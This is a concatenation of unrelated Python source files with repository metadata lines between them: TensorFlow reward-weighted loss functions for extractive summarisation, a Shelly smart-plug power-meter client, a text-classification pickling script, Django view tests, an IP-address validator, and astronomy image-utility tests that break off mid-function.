# [[a,a], [b,b], [c,c], [d,d], [e,e], [f,f]] [6 x 2]
actual_rewards = tf.reshape(actual_rewards, [-1, 1, FLAGS.max_doc_length]) # [FLAGS.batch_size, 1, FLAGS.max_doc_length],
# [[[a,a], [b,b]], [[c,c], [d,d]], [[e,e], [f,f]]] [3 x 2 x 2]
# Multiply with reward
reward_weighted_cross_entropy = tf.mul(cross_entropy, actual_rewards) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
    # Cross entropy / sample / document
reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=2) # [FLAGS.batch_size, 1]
reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcemultisample')
tf.add_to_collection('reward_cross_entropy_loss_multisample', reward_weighted_cross_entropy_mean)
return reward_weighted_cross_entropy_mean
def reward_weighted_cross_entropy_loss(logits, labels, actual_rewards, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    labels: Label placeholder for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    actual_rewards: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# Reshape actual rewards
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# Multiply with reward
reward_weighted_cross_entropy = tf.mul(cross_entropy, actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length]
    # Cross entropy / document
reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
return reward_weighted_cross_entropy_mean
# def reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights):
# """Estimate cost of predictions
# Add summary for "cost" and "cost/avg".
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# Returns:
# Cross-entropy Cost
# """
# with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# # Error: actual_rewards = tf.reshape(tf.tile(actual_rewards, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Multiply with reward
# reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Cross entroy / document
# reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
# tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
# return reward_weighted_cross_entropy_mean
# def temp_reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights):
# """Estimate cost of predictions
# Add summary for "cost" and "cost/avg".
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# Returns:
# Cross-entropy Cost
# """
# with tf.variable_scope('TempRewardWeightedCrossEntropyLoss') as scope:
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Multiply with reward
# reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Cross entroy / document
# reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_mean, var_list=policy_network_variables)
# # print(grads_and_vars)
# return actual_rewards, cross_entropy, diff_act_pred, reward_weighted_cross_entropy, reward_weighted_cross_entropy_mean, grads_and_vars
# def cross_entropy_loss_selfprediction(logits, weights):
# """Optimizing expected reward: Weighted cross entropy
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# return:
# [FLAGS.batch_size, FLAGS.max_doc_length]
# """
# with tf.variable_scope('SelfPredCrossEntropyLoss') as scope:
# # Reshape logits for argmax and argmin
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get labels if predicted using these logits
# logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
# labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
# labels = tf.cast(labels, dtype)
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # softmax_cross_entropy_with_logits
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights)
# return cross_entropy
# def weighted_cross_entropy_loss(logits, future_rewards, actual_reward, weights):
# """Optimizing expected reward: Weighted cross entropy
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# """
# with tf.variable_scope('WeightedCrossEntropyLoss') as scope:
# # Get Weights: External reward - Predicted reward
# actual_reward = tf.reshape(tf.tile(actual_reward, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = future_rewards - actual_reward # actual_reward - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits for argmax and argmin
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get labels if predicted using these logits
# logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
# labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
# labels = tf.cast(labels, dtype)
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # softmax_cross_entropy_with_logits
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights)
# # Multiply with reward
# cross_entropy = tf.mul(cross_entropy, diff_act_pred)
# # Cross entroy / document
# cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
# tf.add_to_collection('reward_cross_entropy_loss', cross_entropy_mean)
# # # # The total loss is defined as the cross entropy loss plus all of
# # # # the weight decay terms (L2 loss).
# # # return tf.add_n(tf.get_collection('losses'), name='total_loss')
# return cross_entropy_mean
### Training functions
def train_cross_entropy_loss(cross_entropy_loss):
""" Training with Gold Label: Pretraining network to start with a better policy
Args: cross_entropy_loss
"""
with tf.variable_scope('TrainCrossEntropyLoss') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of policy network
policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# print(policy_network_variables)
grads_and_vars = optimizer.compute_gradients(cross_entropy_loss, var_list=policy_network_variables)
# print(grads_and_vars)
# Apply Gradients
return optimizer.apply_gradients(grads_and_vars)
def train_meansq_loss(futreward_meansq_loss):
""" Training with Gold Label: Pretraining network to start with a better policy
Args: futreward_meansq_loss
"""
with tf.variable_scope('TrainMeanSqLoss') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of Future reward estimator
futreward_estimator_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="FutureRewardEstimator")
# print(futreward_estimator_variables)
grads_and_vars = optimizer.compute_gradients(futreward_meansq_loss, var_list=futreward_estimator_variables)
# print(grads_and_vars)
# Apply Gradients
return optimizer.apply_gradients(grads_and_vars)
def train_neg_expectedreward(reward_weighted_cross_entropy_loss_multisample):
"""Training with Policy Gradient: Optimizing expected reward
args:
reward_weighted_cross_entropy_loss_multisample
"""
with tf.variable_scope('TrainExpReward') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of policy network
policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# print(policy_network_variables)
# Compute gradients of policy network
grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss_multisample, var_list=policy_network_variables)
# print(grads_and_vars)
# Clip gradient: Pascanu et al. 2013, Exploding gradient problem
grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# Apply Gradients
# return optimizer.apply_gradients(grads_and_vars)
return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def train_neg_expectedreward(reward_weighted_cross_entropy_loss):
# """Training with Policy Gradient: Optimizing expected reward
# args:
# reward_weighted_cross_entropy_loss
# """
# with tf.variable_scope('TrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss, var_list=policy_network_variables)
# # print(grads_and_vars)
# # Clip gradient: Pascanu et al. 2013, Exploding gradient problem
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# # Apply Gradients
# # return optimizer.apply_gradients(grads_and_vars)
# return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def train_neg_expectedreward(logits, d_ltheta_ot):
# """Training with Policy Gradient: Optimizing expected reward
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# d_ltheta_ot: Placeholder [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# """
# with tf.variable_scope('TrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Modify logits with d_ltheta_ot
# logits = tf.mul(logits, d_ltheta_ot)
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables)
# # print(grads_and_vars)
# # Clip gradient: Pascanu et al. 2013, Exploding gradient problem
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# # Apply Gradients
# # return optimizer.apply_gradients(grads_and_vars)
# return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def temp_train_neg_expectedreward(logits, d_ltheta_ot):
# with tf.variable_scope('TempTrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Modify logits with d_ltheta_ot
# logits = tf.mul(logits, d_ltheta_ot)
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables)
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# grads_and_vars_capped_val = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in grads_and_vars]
# # tf.clip_by_norm(t, clip_norm, axes=None, name=None)
# # https://www.tensorflow.org/versions/r0.11/api_docs/python/train/gradient_clipping
# return grads_and_vars, grads_and_vars_capped_norm, grads_and_vars_capped_val
### Accuracy Calculations
def accuracy(logits, labels, weights):
"""Estimate accuracy of predictions
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    labels: Sentence extraction gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Accuracy: Estimates average of accuracy for each sentence
"""
with tf.variable_scope('Accuracy') as scope:
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
correct_pred = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1)) # [FLAGS.batch_size*FLAGS.max_doc_length]
correct_pred = tf.reshape(correct_pred, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
correct_pred = tf.cast(correct_pred, tf.float32)
# Get Accuracy
accuracy = tf.reduce_mean(correct_pred, name='accuracy')
if FLAGS.weighted_loss:
correct_pred = tf.mul(correct_pred, weights)
correct_pred = tf.reduce_sum(correct_pred, reduction_indices=1) # [FLAGS.batch_size]
doc_lengths = tf.reduce_sum(weights, reduction_indices=1) # [FLAGS.batch_size]
correct_pred_avg = tf.div(correct_pred, doc_lengths)
accuracy = tf.reduce_mean(correct_pred_avg, name='accuracy')
return accuracy
# Improve it to show exact accuracy (top three ranked ones), not all.
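# --- Added illustration (not part of the original graph code): a minimal NumPy sketch of the
# weighted accuracy above, assuming one-hot labels. Padded sentences are masked out via the
# weights and accuracy is averaged per document before averaging over the batch; the helper
# name masked_accuracy_np is hypothetical.
import numpy as np
def masked_accuracy_np(logits, labels, weights):
    # logits, labels: [batch, max_doc_length, target_label_size]; weights: [batch, max_doc_length]
    correct = (logits.argmax(-1) == labels.argmax(-1)).astype(np.float32)
    correct = correct * weights                       # zero out padded sentences
    doc_lengths = weights.sum(axis=1)                 # true number of sentences per document
    return float((correct.sum(axis=1) / doc_lengths).mean())
_demo_logits = np.array([[[0.9, 0.1], [0.2, 0.8], [0.5, 0.5]]])
_demo_labels = np.array([[[1.0, 0.0], [0.0, 1.0], [1.0, 0.0]]])
_demo_weights = np.array([[1.0, 1.0, 0.0]])           # third sentence is padding
assert masked_accuracy_np(_demo_logits, _demo_labels, _demo_weights) == 1.0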
|
utils/measure/powermeter/shelly.py
|
mooonsee/homeassistant-powercalc
| 219 |
64382
|
<reponame>mooonsee/homeassistant-powercalc
from __future__ import annotations
import logging
import requests
import time
from .errors import ConnectionError
from .powermeter import PowerMeasurementResult, PowerMeter
_LOGGER = logging.getLogger("measure")
class ShellyApi:
status_endpoint = "/status"
meter_endpoint = "/meter/0"
def parse_json(self, json: dict) -> tuple[float, float]:
pass
class ShellyApiGen1(ShellyApi):
api_version = 1
def parse_json(self, json) -> tuple[float, float]:
return (
float(json["power"]),
float(json["timestamp"])
)
class ShellyApiGen2(ShellyApi):
api_version = 2
status_endpoint = "/rpc/Shelly.GetStatus"
meter_endpoint = "/rpc/Switch.GetStatus?id=0"
def parse_json(self, json) -> tuple[float, float]:
return (
float(json["apower"]),
time.time()
)
class ShellyPowerMeter(PowerMeter):
def __init__(self, shelly_ip: str, timeout: int = 5):
self.timeout = timeout
self.ip_address = shelly_ip
self.api = self.detect_api_type()
def get_power(self) -> PowerMeasurementResult:
r = requests.get("http://{}{}".format(self.ip_address, self.api.meter_endpoint), timeout=self.timeout)
json = r.json()
power = self.api.parse_json(json)
return PowerMeasurementResult(power[0], power[1])
def detect_api_type(self) -> ShellyApi:
for api in (ShellyApiGen1(), ShellyApiGen2()):
try:
uri = "http://{}{}".format(self.ip_address, api.status_endpoint)
_LOGGER.debug(f"Checking API connection: {uri}")
response = requests.get(uri, timeout=self.timeout)
except requests.RequestException:
_LOGGER.debug("Connection could not be established")
continue
if response.status_code != 200:
_LOGGER.debug(f"Unexpected status code {response.status_code}")
continue
_LOGGER.debug(f"Shelly API version {api.api_version} detected")
return api
raise ConnectionError("Could not connect to Shelly Plug")
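# --- Added usage sketch (illustration only): the IP address below is a placeholder for a
# reachable Shelly plug on the local network; constructing the meter probes the device and
# raises the ConnectionError defined in .errors if neither API generation responds.
if __name__ == "__main__":
    meter = ShellyPowerMeter("192.168.1.50", timeout=5)
    print(meter.get_power())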
|
Section 7 - Text Classification/Text Classification Part 2 - Pickling and Unpickling dataset.py
|
kungfumas/bahasa-alami
| 169 |
64389
|
# Text Classifiation using NLP
# Importing the libraries
import numpy as np
import re
import pickle
import nltk
from nltk.corpus import stopwords
from sklearn.datasets import load_files
nltk.download('stopwords')
# Importing the dataset
reviews = load_files('txt_sentoken/')
X,y = reviews.data,reviews.target
# Pickling the dataset
with open('X.pickle','wb') as f:
pickle.dump(X,f)
with open('y.pickle','wb') as f:
pickle.dump(y,f)
# Unpickling dataset
with open('X.pickle','rb') as f:
    X = pickle.load(f)
with open('y.pickle','rb') as f:
    y = pickle.load(f)
|
bootcamp/feeds/tests.py
|
elviva404/bootcamp
| 115 |
64406
|
from django.test import TestCase, Client
from django.contrib.auth.models import User
from .models import Feed
class FeedViewsTest(TestCase):
def setUp(self):
self.client = Client()
user = User.objects.create_user(
username='test_user',
email='<EMAIL>',
password='<PASSWORD>'
)
self.feed = Feed.objects.create(user=user, post='test feed')
def test_feeds(self):
response = self.client.get('/feeds/')
self.assertEqual(response.status_code, 200)
def test_feed(self):
response = self.client.get('/feeds/123/')
self.assertEqual(response.status_code, 404)
response = self.client.get(f'/feeds/{self.feed.pk}/')
self.assertEqual(response.status_code, 200)
|
Algo and DSA/LeetCode-Solutions-master/Python/validate-ip-address.py
|
Sourav692/FAANG-Interview-Preparation
| 3,269 |
64428
|
# Time: O(1)
# Space: O(1)
import string
class Solution(object):
def validIPAddress(self, IP):
"""
:type IP: str
:rtype: str
"""
blocks = IP.split('.')
if len(blocks) == 4:
for i in xrange(len(blocks)):
if not blocks[i].isdigit() or not 0 <= int(blocks[i]) < 256 or \
(blocks[i][0] == '0' and len(blocks[i]) > 1):
return "Neither"
return "IPv4"
blocks = IP.split(':')
if len(blocks) == 8:
for i in xrange(len(blocks)):
if not (1 <= len(blocks[i]) <= 4) or \
not all(c in string.hexdigits for c in blocks[i]):
return "Neither"
return "IPv6"
return "Neither"
|
test/test_Util/test_image_util.py
|
lucateo/lenstronomy
| 107 |
64458
|
<reponame>lucateo/lenstronomy<filename>test/test_Util/test_image_util.py
__author__ = 'sibirrer'
import lenstronomy.Util.util as util
import pytest
import unittest
import numpy as np
import numpy.testing as npt
import lenstronomy.Util.image_util as image_util
def test_add_layer2image_odd_odd():
grid2d = np.zeros((101, 101))
kernel = np.zeros((21, 21))
kernel[10, 10] = 1
x_pos = 50
y_pos = 50
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[50, 50] == 1
assert added[49, 49] == 0
x_pos = 70
y_pos = 95
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[95, 70] == 1
x_pos = 20
y_pos = 45
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[45, 20] == 1
x_pos = 45
y_pos = 20
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[20, 45] == 1
x_pos = 20
y_pos = 55
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[55, 20] == 1
x_pos = 20
y_pos = 100
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[100, 20] == 1
x_pos = 20.5
y_pos = 100
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=1)
assert added[100, 20] == 0.5
assert added[100, 21] == 0.5
def test_add_layer2image_int():
grid2d = np.zeros((7, 7))
x_pos, y_pos = 4, 1
kernel = np.ones((3, 3))
added = image_util.add_layer2image_int(grid2d, x_pos, y_pos, kernel)
print(added)
assert added[0, 0] == 0
assert added[0, 3] == 1
added = image_util.add_layer2image_int(grid2d, x_pos + 10, y_pos, kernel)
print(added)
npt.assert_almost_equal(grid2d, added, decimal=9)
def test_add_background():
image = np.ones((10, 10))
sigma_bkgd = 1.
image_noisy = image_util.add_background(image, sigma_bkgd)
assert abs(np.sum(image_noisy)) < np.sqrt(np.sum(image)*sigma_bkgd)*3
def test_add_poisson():
image = np.ones((100, 100))
exp_time = 100.
poisson = image_util.add_poisson(image, exp_time)
assert abs(np.sum(poisson)) < np.sqrt(np.sum(image)/exp_time)*10
def test_findOverlap():
x_mins = [0,1,0]
y_mins = [1,2,1]
deltapix = 0.5
x_mins, y_mins = image_util.findOverlap(x_mins, y_mins, deltapix)
print(x_mins, y_mins)
assert x_mins[0] == 0
assert y_mins[0] == 1
assert len(x_mins) == 2
def test_coordInImage():
x_coord = [100,20,-10]
y_coord = [0,-30,5]
numPix = 50
deltapix = 1
x_result, y_result = image_util.coordInImage(x_coord, y_coord, numPix, deltapix)
assert x_result == -10
assert y_result == 5
def test_rebin_coord_transform():
x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix = util.make_grid_with_coordtransform(numPix=3, deltapix=0.03, subgrid_res=1)
x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re, y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re = util.make_grid_with_coordtransform(numPix=1, deltapix=0.09, subgrid_res=1)
ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized, y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized = image_util.rebin_coord_transform(3, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
assert ra_at_xy_0_resized == ra_at_xy_0_re
assert dec_at_xy_0_resized == dec_at_xy_0_re
assert x_at_radec_0_resized == x_at_radec_0_re
assert y_at_radec_0_resized == y_at_radec_0_re
npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)
x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix = util.make_grid_with_coordtransform(numPix=100, deltapix=0.05, subgrid_res=1)
x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re, y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re = util.make_grid_with_coordtransform(numPix=50, deltapix=0.1, subgrid_res=1)
